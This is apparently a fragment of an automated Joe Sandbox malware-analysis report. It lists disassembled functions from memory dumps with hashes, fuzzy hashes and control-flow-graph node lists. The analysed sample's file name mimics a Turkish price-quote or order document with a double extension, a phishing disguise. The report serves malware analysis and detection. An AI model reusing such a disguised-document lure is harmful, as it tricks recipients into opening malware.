                                                                                                      • Opcode ID: 23f33ce552fd7430cddbc26dc135d48b4670ba6f469cccf2b068fadc3bd02431
                                                                                                      • Instruction ID: 43d7b4dc879e30e951c728611b14dd4419f47138689efa78e27615fdca9b3c89
                                                                                                      • Opcode Fuzzy Hash: 23f33ce552fd7430cddbc26dc135d48b4670ba6f469cccf2b068fadc3bd02431
                                                                                                      • Instruction Fuzzy Hash: 07C17E74E00218CFEB54DFA5D994BDDBBB2BB89304F2081A9D809AB355DB359E81CF50
                                                                                                      Function 051B2DC8 Relevance: .2, Instructions: 220COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b565cfa2e230e6ccd4158b8d25f710d2c21c5bf6ffc115b67c41a0e98e7c2ae0
                                                                                                      • Instruction ID: af63e232c2a9c38a2274a3409d5a5da88215a2661018fe13b3fda3592f279c13
                                                                                                      • Opcode Fuzzy Hash: b565cfa2e230e6ccd4158b8d25f710d2c21c5bf6ffc115b67c41a0e98e7c2ae0
                                                                                                      • Instruction Fuzzy Hash: 07A11574D00208CFEB14DFA9C948BDDBBB1FF88314F208269E419AB2A1DB759985CF55
                                                                                                      Function 051B2DC3 Relevance: .2, Instructions: 218COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ee89067dfa43f4c7659bb77122e9ec9d4301aec8d55bec11a3065b29962d2547
                                                                                                      • Instruction ID: 0be8f3534e1c99d3948a1eb48a51762b9f6868df9668732e0a79763c072c6cd4
                                                                                                      • Opcode Fuzzy Hash: ee89067dfa43f4c7659bb77122e9ec9d4301aec8d55bec11a3065b29962d2547
                                                                                                      • Instruction Fuzzy Hash: 00A10574D00208CFEB14DFA9C948BDDBBB1FF88300F248269E419AB291DB759985CF55
                                                                                                      Function 051B310E Relevance: .2, Instructions: 202COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7bc36c29aca29a7fb06c53becfa62cbaecbd11138c66fce21b125ef21141a04a
                                                                                                      • Instruction ID: 412e2584193e0a8215b0faa78a84a6ed4d3e2a301ce2af4aa7a5917421f66c5e
                                                                                                      • Opcode Fuzzy Hash: 7bc36c29aca29a7fb06c53becfa62cbaecbd11138c66fce21b125ef21141a04a
                                                                                                      • Instruction Fuzzy Hash: 1D91F274D00218CFEB24DFA9C988BDCBBB5FF49310F208269E419AB291DB759985CF15
                                                                                                      Function 02A1E988 Relevance: .1, Instructions: 147COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f4a2d892be62bf2a4f8c8eec11790c94202580c31358bed7715846657d33dae6
                                                                                                      • Instruction ID: e59e46b682d9248c1c8865e20d790e8ed387251d2f861468fd4692aa152cf986
                                                                                                      • Opcode Fuzzy Hash: f4a2d892be62bf2a4f8c8eec11790c94202580c31358bed7715846657d33dae6
                                                                                                      • Instruction Fuzzy Hash: 28518474E00208DFEB18DFAAD994A9DBBB2FF89310F248129E815AB364DB305941CF55
                                                                                                      Function 02A1E97B Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e4492342b0c7bd12c1adb818e2c432394a7d0a95bbbe7f27cae0f2b542476209
                                                                                                      • Instruction ID: 17b53cfc5df059b4115156b441a85576c2907c1c95ca6e24b5a04803b82c0b08
                                                                                                      • Opcode Fuzzy Hash: e4492342b0c7bd12c1adb818e2c432394a7d0a95bbbe7f27cae0f2b542476209
                                                                                                      • Instruction Fuzzy Hash: FB51A674E00208DFEB18DFAAD994A9DBBB2FF89310F24C129E815AB365DB305941CF54
                                                                                                      Function 05777B69 Relevance: .1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7f7d8920caa897bb2dc2a61af953b810da25ac33e1869da938183fc29976d44f
                                                                                                      • Instruction ID: 9b288b45f30d72dd176b9d99b9aae1668c2ede2c3a830005fadbb62814ca96fc
                                                                                                      • Opcode Fuzzy Hash: 7f7d8920caa897bb2dc2a61af953b810da25ac33e1869da938183fc29976d44f
                                                                                                      • Instruction Fuzzy Hash: F041E470E006088BEB18DFAAD9447DEBBF2BF88300F14C06AC418BB254DB755946CF54
                                                                                                      Function 0577B307 Relevance: .1, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d5e2156cfc11b491e07c6c3a09518ea952bc94485de44d3ed7b93dc3d8548acc
                                                                                                      • Instruction ID: 9c13620e2f132719f52c3963e8f169e4939ae2a8863b91ea9ed0b97adab10b67
                                                                                                      • Opcode Fuzzy Hash: d5e2156cfc11b491e07c6c3a09518ea952bc94485de44d3ed7b93dc3d8548acc
                                                                                                      • Instruction Fuzzy Hash: 1E41C474E00248CBEB08DFAAD9446DDBBB2EF89304F24C12AD419BB258EB345945DF50
                                                                                                      Function 05778FA1 Relevance: .1, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6bcdd516bbb1c9332c04378709a99fca95ede756c39b495b7d7d194b80cf436d
                                                                                                      • Instruction ID: b3d9382cba481ed3b05d778de9b565572dd49b3eebb983185a81e0a9421b673e
                                                                                                      • Opcode Fuzzy Hash: 6bcdd516bbb1c9332c04378709a99fca95ede756c39b495b7d7d194b80cf436d
                                                                                                      • Instruction Fuzzy Hash: 5A41D571E012088BEF08DFAAD9547DEBBF2AF89300F24C12AD514BB258EB745946CF50
                                                                                                      Function 02A176F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 2a176f1-2a17725 1 2a17b54-2a17b58 0->1 2 2a1772b-2a1774e 0->2 3 2a17b71-2a17b7f 1->3 4 2a17b5a-2a17b6e 1->4 11 2a17754-2a17761 2->11 12 2a177fc-2a17800 2->12 9 2a17b81-2a17b96 3->9 10 2a17bf0-2a17c05 3->10 20 2a17b98-2a17b9b 9->20 21 2a17b9d-2a17baa 9->21 22 2a17c07-2a17c0a 10->22 23 2a17c0c-2a17c19 10->23 26 2a17770 11->26 27 2a17763-2a1776e 11->27 13 2a17802-2a17810 12->13 14 2a17848-2a17851 12->14 13->14 34 2a17812-2a1782d 13->34 17 2a17c67 14->17 18 2a17857-2a17861 14->18 35 2a17c6c-2a17c9c 17->35 18->1 24 2a17867-2a17870 18->24 28 2a17bac-2a17bed 20->28 21->28 29 2a17c1b-2a17c56 22->29 23->29 32 2a17872-2a17877 24->32 33 2a1787f-2a1788b 24->33 36 2a17772-2a17774 26->36 27->36 76 2a17c5d-2a17c64 29->76 32->33 33->35 40 2a17891-2a17897 33->40 60 2a1783b 34->60 61 2a1782f-2a17839 34->61 53 2a17cb5-2a17cbc 35->53 54 2a17c9e-2a17cb4 35->54 36->12 37 2a1777a-2a177dc 36->37 88 2a177e2-2a177f9 37->88 89 2a177de 37->89 43 2a1789d-2a178ad 40->43 44 2a17b3e-2a17b42 40->44 58 2a178c1-2a178c3 43->58 59 2a178af-2a178bf 43->59 44->17 47 2a17b48-2a17b4e 44->47 47->1 47->24 62 2a178c6-2a178cc 58->62 59->62 63 2a1783d-2a1783f 60->63 61->63 62->44 70 2a178d2-2a178e1 62->70 63->14 71 2a17841 63->71 72 2a178e7 70->72 73 2a1798f-2a179ba call 2a17538 * 2 70->73 71->14 74 2a178ea-2a178fb 72->74 90 2a179c0-2a179c4 73->90 91 2a17aa4-2a17abe 73->91 74->35 79 2a17901-2a17913 74->79 79->35 81 2a17919-2a17931 79->81 144 2a17933 call 2a180c9 81->144 145 2a17933 call 2a180d8 81->145 84 2a17939-2a17949 84->44 87 2a1794f-2a17952 84->87 92 2a17954-2a1795a 87->92 93 2a1795c-2a1795f 87->93 88->12 89->88 90->44 95 2a179ca-2a179ce 90->95 91->1 113 2a17ac4-2a17ac8 91->113 92->93 96 2a17965-2a17968 92->96 93->17 93->96 98 2a179d0-2a179dd 95->98 99 2a179f6-2a179fc 95->99 100 2a17970-2a17973 96->100 101 2a1796a-2a1796e 96->101 116 2a179ec 98->116 117 2a179df-2a179ea 98->117 102 2a17a37-2a17a3d 99->102 103 2a179fe-2a17a02 99->103 100->17 104 2a17979-2a1797d 100->104 101->100 101->104 106 2a17a49-2a17a4f 102->106 107 2a17a3f-2a17a43 102->107 103->102 105 2a17a04-2a17a0d 103->105 104->17 110 2a17983-2a17989 104->110 111 2a17a1c-2a17a32 105->111 112 2a17a0f-2a17a14 105->112 114 2a17a51-2a17a55 106->114 115 2a17a5b-2a17a5d 106->115 107->76 107->106 110->73 110->74 111->44 112->111 118 2a17b04-2a17b08 113->118 119 2a17aca-2a17ad4 call 2a163e0 113->119 114->44 114->115 120 2a17a92-2a17a94 115->120 121 2a17a5f-2a17a68 115->121 122 2a179ee-2a179f0 116->122 117->122 118->76 125 2a17b0e-2a17b12 118->125 119->118 133 2a17ad6-2a17aeb 119->133 120->44 123 2a17a9a-2a17aa1 120->123 128 2a17a77-2a17a8d 121->128 129 2a17a6a-2a17a6f 121->129 122->44 122->99 125->76 130 2a17b18-2a17b25 125->130 128->44 129->128 135 2a17b34 130->135 136 2a17b27-2a17b32 130->136 133->118 141 2a17aed-2a17b02 133->141 138 2a17b36-2a17b38 135->138 136->138 138->44 138->76 141->1 141->118 144->84 145->84
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                      • API String ID: 0-2212926057
                                                                                                      • Opcode ID: c77fbeb6f0def1e2b1acd7ee230fe1e16e70aaad072362fb8ca42f016face4bf
                                                                                                      • Instruction ID: 4ab13c76fd7c4da90a96c36402f638ba15dfa9fcf993a8ea5a1b4f7a22c86c0a
                                                                                                      • Opcode Fuzzy Hash: c77fbeb6f0def1e2b1acd7ee230fe1e16e70aaad072362fb8ca42f016face4bf
                                                                                                      • Instruction Fuzzy Hash: 57125A34A002089FDB24CF69D984AAEFBF2FF49324F149599E9569B361DB30ED41CB50
                                                                                                      Function 02A18490 Relevance: 3.2, Strings: 2, Instructions: 705COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1789 2a18490-2a1897e 1864 2a18ed0-2a18f05 1789->1864 1865 2a18984-2a18994 1789->1865 1870 2a18f11-2a18f2f 1864->1870 1871 2a18f07-2a18f0c 1864->1871 1865->1864 1866 2a1899a-2a189aa 1865->1866 1866->1864 1867 2a189b0-2a189c0 1866->1867 1867->1864 1869 2a189c6-2a189d6 1867->1869 1869->1864 1872 2a189dc-2a189ec 1869->1872 1882 2a18f31-2a18f3b 1870->1882 1883 2a18fa6-2a18fb2 1870->1883 1873 2a18ff6-2a18ffb 1871->1873 1872->1864 1874 2a189f2-2a18a02 1872->1874 1874->1864 1876 2a18a08-2a18a18 1874->1876 1876->1864 1877 2a18a1e-2a18a2e 1876->1877 1877->1864 1879 2a18a34-2a18a44 1877->1879 1879->1864 1880 2a18a4a-2a18a5a 1879->1880 1880->1864 1884 2a18a60-2a18ecf 1880->1884 1882->1883 1888 2a18f3d-2a18f49 1882->1888 1889 2a18fb4-2a18fc0 1883->1889 1890 2a18fc9-2a18fd5 1883->1890 1896 2a18f4b-2a18f56 1888->1896 1897 2a18f6e-2a18f71 1888->1897 1889->1890 1898 2a18fc2-2a18fc7 1889->1898 1899 2a18fd7-2a18fe3 1890->1899 1900 2a18fec-2a18fee 1890->1900 1896->1897 1911 2a18f58-2a18f62 1896->1911 1901 2a18f73-2a18f7f 1897->1901 1902 2a18f88-2a18f94 1897->1902 1898->1873 1899->1900 1909 2a18fe5-2a18fea 1899->1909 1900->1873 1901->1902 1912 2a18f81-2a18f86 1901->1912 1905 2a18f96-2a18f9d 1902->1905 1906 2a18ffc-2a1901e 1902->1906 1905->1906 1910 2a18f9f-2a18fa4 1905->1910 1915 2a19020 1906->1915 1916 2a1902e 1906->1916 1909->1873 1910->1873 1911->1897 1921 2a18f64-2a18f69 1911->1921 1912->1873 1915->1916 1919 2a19027-2a1902c 1915->1919 1920 2a19030-2a19031 1916->1920 1919->1920 1921->1873
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $q$$q
                                                                                                      • API String ID: 0-3126353813
                                                                                                      • Opcode ID: bf3c13561825fc3959d1c063ae7acdff7bb432a0bf172791ba84bbc799acfbf2
                                                                                                      • Instruction ID: e6c666aa6c1ddf48358691e93d095a50bdf6fc3e52af497813d445e4bc5ff258
                                                                                                      • Opcode Fuzzy Hash: bf3c13561825fc3959d1c063ae7acdff7bb432a0bf172791ba84bbc799acfbf2
                                                                                                      • Instruction Fuzzy Hash: 76520234A002188FEB25DBA4C860B9EBB77EF89301F1081AED10A6B395CF355E45EF55
                                                                                                      Function 02A15F38 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2345 2a15f38-2a15f5a 2346 2a15f70-2a15f7b 2345->2346 2347 2a15f5c-2a15f60 2345->2347 2350 2a15f81-2a15f83 2346->2350 2351 2a16023-2a1604f 2346->2351 2348 2a15f62-2a15f6e 2347->2348 2349 2a15f88-2a15f8f 2347->2349 2348->2346 2348->2349 2352 2a15f91-2a15f98 2349->2352 2353 2a15faf-2a15fb8 2349->2353 2354 2a1601b-2a16020 2350->2354 2357 2a16056-2a160ae 2351->2357 2352->2353 2355 2a15f9a-2a15fa5 2352->2355 2450 2a15fba call 2a15f38 2353->2450 2451 2a15fba call 2a15f2b 2353->2451 2355->2357 2358 2a15fab-2a15fad 2355->2358 2377 2a160b0-2a160b6 2357->2377 2378 2a160bd-2a160cf 2357->2378 2358->2354 2359 2a15fc0-2a15fc2 2360 2a15fc4-2a15fc8 2359->2360 2361 2a15fca-2a15fd2 2359->2361 2360->2361 2363 2a15fe5-2a16004 call 2a169a0 2360->2363 2364 2a15fe1-2a15fe3 2361->2364 2365 2a15fd4-2a15fd9 2361->2365 2371 2a16006-2a1600f 2363->2371 2372 2a16019 2363->2372 2364->2354 2365->2364 2448 2a16011 call 2a1aef0 2371->2448 2449 2a16011 call 2a1afad 2371->2449 2372->2354 2374 2a16017 2374->2354 2377->2378 2380 2a16163-2a16165 2378->2380 2381 2a160d5-2a160d9 2378->2381 2446 2a16167 call 2a162f0 2380->2446 2447 2a16167 call 2a16300 2380->2447 2382 2a160e9-2a160f6 2381->2382 2383 2a160db-2a160e7 2381->2383 2389 2a160f8-2a16102 2382->2389 2383->2389 2384 2a1616d-2a16173 2387 2a16175-2a1617b 2384->2387 2388 2a1617f-2a16186 2384->2388 2390 2a161e1-2a16240 2387->2390 2391 2a1617d 2387->2391 2394 2a16104-2a16113 2389->2394 2395 2a1612f-2a16133 2389->2395 2403 2a16247-2a1626b 2390->2403 2391->2388 2406 2a16123-2a1612d 2394->2406 2407 2a16115-2a1611c 2394->2407 2396 2a16135-2a1613b 2395->2396 2397 2a1613f-2a16143 2395->2397 2399 2a16189-2a161da 2396->2399 2400 2a1613d 2396->2400 2397->2388 2401 2a16145-2a16149 2397->2401 2399->2390 2400->2388 2401->2403 2404 2a1614f-2a16161 2401->2404 2414 2a16271-2a16273 2403->2414 2415 2a1626d-2a1626f 2403->2415 2404->2388 2406->2395 2407->2406 2417 2a16275-2a16279 2414->2417 2418 2a16284-2a16286 2414->2418 2416 2a162e9-2a162ec 2415->2416 2422 2a1627b-2a1627d 2417->2422 2423 2a1627f-2a16282 2417->2423 2424 2a16299-2a1629f 2418->2424 2425 2a16288-2a1628c 2418->2425 2422->2416 2423->2416 2429 2a162a1-2a162c8 2424->2429 2430 2a162ca-2a162cc 2424->2430 2426 2a16292-2a16297 2425->2426 2427 2a1628e-2a16290 2425->2427 2426->2416 2427->2416 2433 2a162d3-2a162d5 2429->2433 2430->2433 2436 2a162d7-2a162d9 2433->2436 2437 2a162db-2a162dd 2433->2437 2436->2416 2439 2a162e6 2437->2439 2440 2a162df-2a162e4 2437->2440 2439->2416 2440->2416 2446->2384 2447->2384 2448->2374 2449->2374 2450->2359 2451->2359
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hq$Hq
                                                                                                      • API String ID: 0-925789375
                                                                                                      • Opcode ID: 754e1ecc3e0dd3064c0d193264e7a5f651d8b1873b65d973d043a90b19bd6be3
                                                                                                      • Instruction ID: 0a962b9d257f7ce432ab0b9d994385099d67cd91e5e7c6aa5309188583e4a35f
                                                                                                      • Opcode Fuzzy Hash: 754e1ecc3e0dd3064c0d193264e7a5f651d8b1873b65d973d043a90b19bd6be3
                                                                                                      • Instruction Fuzzy Hash: 7AB1CF30B042108FDB159F29D894B6E7BFAAF89724F18886AE446CB391DF34CC46C791
                                                                                                      Function 02A16498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2453 2a16498-2a164a5 2454 2a164a7-2a164ab 2453->2454 2455 2a164ad-2a164af 2453->2455 2454->2455 2456 2a164b4-2a164bf 2454->2456 2457 2a166c0-2a166c7 2455->2457 2458 2a164c5-2a164cc 2456->2458 2459 2a166c8 2456->2459 2460 2a16661-2a16667 2458->2460 2461 2a164d2-2a164e1 2458->2461 2463 2a166cd-2a16705 2459->2463 2464 2a16669-2a1666b 2460->2464 2465 2a1666d-2a16671 2460->2465 2462 2a164e7-2a164f6 2461->2462 2461->2463 2471 2a164f8-2a164fb 2462->2471 2472 2a1650b-2a1650e 2462->2472 2483 2a16707-2a1670c 2463->2483 2484 2a1670e-2a16712 2463->2484 2464->2457 2466 2a16673-2a16679 2465->2466 2467 2a166be 2465->2467 2466->2459 2469 2a1667b-2a1667e 2466->2469 2467->2457 2469->2459 2473 2a16680-2a16695 2469->2473 2474 2a1651a-2a16520 2471->2474 2475 2a164fd-2a16500 2471->2475 2472->2474 2476 2a16510-2a16513 2472->2476 2494 2a16697-2a1669d 2473->2494 2495 2a166b9-2a166bc 2473->2495 2485 2a16522-2a16528 2474->2485 2486 2a16538-2a16555 2474->2486 2478 2a16601-2a16607 2475->2478 2479 2a16506 2475->2479 2480 2a16515 2476->2480 2481 2a16566-2a1656c 2476->2481 2489 2a16609-2a1660f 2478->2489 2490 2a1661f-2a16629 2478->2490 2491 2a1662c-2a16639 2479->2491 2480->2491 2492 2a16584-2a16596 2481->2492 2493 2a1656e-2a16574 2481->2493 2496 2a16718-2a1671a 2483->2496 2484->2496 2487 2a1652a 2485->2487 2488 2a1652c-2a16536 2485->2488 2526 2a1655e-2a16561 2486->2526 2487->2486 2488->2486 2499 2a16611 2489->2499 2500 2a16613-2a1661d 2489->2500 2490->2491 2512 2a1663b-2a1663f 2491->2512 2513 2a1664d-2a1664f 2491->2513 2515 2a165a6-2a165c9 2492->2515 2516 2a16598-2a165a4 2492->2516 2502 2a16576 2493->2502 2503 2a16578-2a16582 2493->2503 2504 2a166af-2a166b2 2494->2504 2505 2a1669f-2a166ad 2494->2505 2495->2457 2497 2a1671c-2a1672e 2496->2497 2498 2a1672f-2a16736 2496->2498 2499->2490 2500->2490 2502->2492 2503->2492 2504->2459 2508 2a166b4-2a166b7 2504->2508 2505->2459 2505->2504 2508->2494 2508->2495 2512->2513 2520 2a16641-2a16645 2512->2520 2521 2a16653-2a16656 2513->2521 2515->2459 2529 2a165cf-2a165d2 2515->2529 2527 2a165f1-2a165ff 2516->2527 2520->2459 2522 2a1664b 2520->2522 2521->2459 2523 2a16658-2a1665b 2521->2523 2522->2521 2523->2460 2523->2461 2526->2491 2527->2491 2529->2459 2531 2a165d8-2a165ea 2529->2531 2531->2527
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,q$,q
                                                                                                      • API String ID: 0-1667412543
                                                                                                      • Opcode ID: 3077c6e5ed6f8dc731afa290de8c8f02994aabc7a5870c7066d239cd59ef08f7
                                                                                                      • Instruction ID: 7e4ba00c6270b60582be99935b9a9f90d8a52ddfc137be390ad85c944d417040
                                                                                                      • Opcode Fuzzy Hash: 3077c6e5ed6f8dc731afa290de8c8f02994aabc7a5870c7066d239cd59ef08f7
                                                                                                      • Instruction Fuzzy Hash: 7F817E34B00505CFCB18CF69C884AA9BBBAFF89B24B158169D516DB369DF31EC41CB51
                                                                                                      Function 05778A68 Relevance: 2.7, Strings: 2, Instructions: 212COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2592 5778a68-5778a87 2593 5778c42-5778c67 2592->2593 2594 5778a8d-5778a96 2592->2594 2598 5778c6e-5778d08 call 57787a8 2593->2598 2594->2598 2599 5778a9c-5778af1 2594->2599 2643 5778d0d-5778d12 2598->2643 2607 5778af3-5778b18 2599->2607 2608 5778b1b-5778b24 2599->2608 2607->2608 2610 5778b26 2608->2610 2611 5778b29-5778b39 2608->2611 2610->2611 2649 5778b3b call 5778c4a 2611->2649 2650 5778b3b call 5778a59 2611->2650 2651 5778b3b call 5778a68 2611->2651 2614 5778b41-5778b43 2617 5778b45-5778b4a 2614->2617 2618 5778b9d-5778bea 2614->2618 2619 5778b83-5778b96 2617->2619 2620 5778b4c-5778b81 2617->2620 2629 5778bf1-5778bf6 2618->2629 2619->2618 2620->2629 2632 5778c00-5778c05 2629->2632 2633 5778bf8 2629->2633 2634 5778c07 2632->2634 2635 5778c0f-5778c14 2632->2635 2633->2632 2634->2635 2639 5778c16-5778c24 call 577861c call 5778634 2635->2639 2640 5778c29 2635->2640 2639->2640 2640->2593 2649->2614 2650->2614 2651->2614
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (&q$(q
                                                                                                      • API String ID: 0-2464455664
                                                                                                      • Opcode ID: 56ac0a054e34ac0ed16ae007e35a04f108f19572c4361a9be3196755a32c5e93
                                                                                                      • Instruction ID: 878ba0dc9744a44e7ba94dffff7c08e0ded1831526dc53bfd9e4153e90ea90ff
                                                                                                      • Opcode Fuzzy Hash: 56ac0a054e34ac0ed16ae007e35a04f108f19572c4361a9be3196755a32c5e93
                                                                                                      • Instruction Fuzzy Hash: 45719331F002184BDB15DFA9D8557AE7BF2AFC9700F68452AE406AB380DF349D4687D2
                                                                                                      Function 02A1AEF0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (oq$(oq
                                                                                                      • API String ID: 0-1396055846
                                                                                                      • Opcode ID: 9624a8049da7ea689f8f2dc98b14231aba5b966c848b7b17768e5bfd536141b9
                                                                                                      • Instruction ID: c6922a31f9182228587dc0a750327f827965085e2f134af4aecb2f3dd763efe3
                                                                                                      • Opcode Fuzzy Hash: 9624a8049da7ea689f8f2dc98b14231aba5b966c848b7b17768e5bfd536141b9
                                                                                                      • Instruction Fuzzy Hash: F5514732B052548FD7019B75D8547AE7BB6AFCD320B18446AE506DB392DE31CC06C7A1
                                                                                                      Function 02A19C30 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
